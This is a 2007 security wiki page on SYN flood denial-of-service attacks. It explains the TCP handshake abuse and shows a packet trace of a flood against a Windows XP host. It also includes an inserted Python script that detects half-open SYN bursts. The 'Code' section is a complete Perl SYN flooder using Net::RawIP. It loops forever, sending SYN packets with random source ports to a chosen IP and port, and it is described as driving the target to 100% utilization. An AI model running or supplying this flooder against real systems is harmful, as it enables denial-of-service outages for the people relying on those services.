
SYN Flood

From MRL Wiki

A SYN flood is a denial-of-service attack that exploits the three-way handshake (SYN -> SYN/ACK -> ACK) used to establish a TCP connection. By sending a large number of SYN packets without ever responding to the SYN/ACK responses coming from the target host, the attacker creates a large number of half-open connections, eventually exhausting the target host's ability to process any new connections.

Hping

Packet Trace

Below is a packet trace of a typical SYN attack. We are sending SYN packets to the netbios port on a Windows XP machine:

  0.000000 192.168.1.66 -> 192.168.1.250 TCP 24345 > netbios-ssn [SYN] Seq=0 Len=0
  0.000694 192.168.1.66 -> 192.168.1.250 TCP 15869 > netbios-ssn [SYN] Seq=0 Len=0
  0.001019 192.168.1.66 -> 192.168.1.250 TCP 32851 > netbios-ssn [SYN] Seq=0 Len=0
  0.001337 192.168.1.66 -> 192.168.1.250 TCP 39007 > netbios-ssn [SYN] Seq=0 Len=0
  0.001653 192.168.1.66 -> 192.168.1.250 TCP 12675 > netbios-ssn [SYN] Seq=0 Len=0
  0.001968 192.168.1.66 -> 192.168.1.250 TCP 18094 > netbios-ssn [SYN] Seq=0 Len=0
  0.002287 192.168.1.66 -> 192.168.1.250 TCP 51402 > netbios-ssn [SYN] Seq=0 Len=0
  0.002605 192.168.1.66 -> 192.168.1.250 TCP 33243 > netbios-ssn [SYN] Seq=0 Len=0
  0.002919 192.168.1.66 -> 192.168.1.250 TCP 42948 > netbios-ssn [SYN] Seq=0 Len=0
  ...
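
As an added example (not part of the original wiki page), the script below reads summary lines in the same format as the trace above and reports any destination service that accumulates many SYNs whose handshake is never completed. The function names, the window and threshold defaults, and the 192.0.2.x sample lines are assumptions made for illustration.

```python
import re
from collections import defaultdict

# Matches the summary-line format used in the trace above.
LINE = re.compile(
    r"\s*(\d+\.\d+)\s+(\S+)\s+->\s+(\S+)\s+TCP\s+(\S+)\s+>\s+(\S+)\s+\[([A-Z, ]+)\]")

def half_open(lines):
    """Map (dst, dport) -> sorted timestamps of SYNs never followed by an ACK or RST."""
    pending = {}
    for line in lines:
        m = LINE.match(line)
        if not m:
            continue
        ts, src, dst, sport, dport = float(m[1]), m[2], m[3], m[4], m[5]
        flags = {f.strip() for f in m[6].split(",")}
        if flags == {"SYN"}:
            pending[(src, sport, dst, dport)] = ts          # handshake step 1
        elif "SYN" not in flags and flags & {"ACK", "RST"}:
            pending.pop((src, sport, dst, dport), None)     # client completed or aborted
            pending.pop((dst, dport, src, sport), None)     # server refused (e.g. RST)
    by_service = defaultdict(list)
    for (_, _, dst, dport), ts in pending.items():
        by_service[(dst, dport)].append(ts)
    return {svc: sorted(stamps) for svc, stamps in by_service.items()}

def detect_syn_flood(lines, window=1.0, threshold=5):
    """Return {(dst, dport): peak} where the peak count of half-open SYNs
    inside any `window`-second span is at least `threshold`."""
    alerts = {}
    for svc, stamps in half_open(lines).items():
        peak = start = 0
        for end, ts in enumerate(stamps):
            while ts - stamps[start] > window:
                start += 1                                  # slide window forward
            peak = max(peak, end - start + 1)
        if peak >= threshold:
            alerts[svc] = peak
    return alerts

# Constructed sample: six unanswered SYNs plus one completed handshake.
SAMPLE = [f"  0.00{i}000 192.0.2.66 -> 192.0.2.250 TCP {40000 + i} > netbios-ssn [SYN] Seq=0 Len=0"
          for i in range(6)] + [
    "  0.010000 192.0.2.10 -> 192.0.2.250 TCP 50000 > http [SYN] Seq=0 Len=0",
    "  0.010400 192.0.2.250 -> 192.0.2.10 TCP http > 50000 [SYN, ACK] Seq=0 Ack=1 Len=0",
    "  0.010900 192.0.2.10 -> 192.0.2.250 TCP 50000 > http [ACK] Seq=1 Ack=1 Len=0",
]

if __name__ == "__main__":
    print(detect_syn_flood(SAMPLE))
```

The completed handshake to the http port is not counted, so only the netbios-ssn service is reported.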

Code

The code below is the simplest possible implementation of a SYN flooder. This PoC causes 100% utilization on Windows XP SP2 with the firewall off.

#!/usr/bin/perl
# Simple POC SYN Flooder
# Requires perl, Net::RawIP module, and root privileges
use Net::RawIP;
if($#ARGV == 2) {
   ($src,$dst,$port) = @ARGV;
   $a = new Net::RawIP;
   while(1) {
      $src_port = rand(65534)+1;
      $a->set({ip => {saddr => $src,daddr => $dst},tcp => {source => $src_port,dest => $port, syn => 1}});
      $a->send;   
   }
} else {
   print "./synflooder source_ip destination_ip destination_port\n";
}

Retrieved from "http://www.midnightresearch.com/wiki/index.php/SYN_Flood"

This page has been accessed 5,333 times. This page was last modified on 21 June 2007, at 21:26.

